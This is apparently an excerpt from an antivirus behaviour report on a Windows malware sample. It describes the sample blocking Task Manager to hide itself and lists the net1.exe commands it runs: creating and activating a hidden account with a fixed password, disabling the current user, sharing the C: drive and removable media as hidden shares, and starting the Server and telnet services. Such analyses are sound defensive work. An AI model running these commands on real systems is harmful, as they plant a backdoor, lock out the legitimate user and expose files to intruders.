To complicate detection of its presence in the operating system,
blocks execution of the following system utilities:
- Windows Task Manager (Taskmgr)
Executes the following:
- '<SYSTEM32>\net1.exe' user 2482276197 /active:yes
- '<SYSTEM32>\net1.exe' user 2482276197 JG2482276197 /add
- '<SYSTEM32>\net1.exe' user %USERNAME% /active:no
- '<SYSTEM32>\net1.exe' localgroup %USERNAME%s 2482276197 /add
- '<SYSTEM32>\net1.exe' share houmen2$=<Drive name for removable media>:\
- '<SYSTEM32>\net1.exe' share houmen$=c:\
- '<SYSTEM32>\net1.exe' start Server
- '<SYSTEM32>\net1.exe' start telnet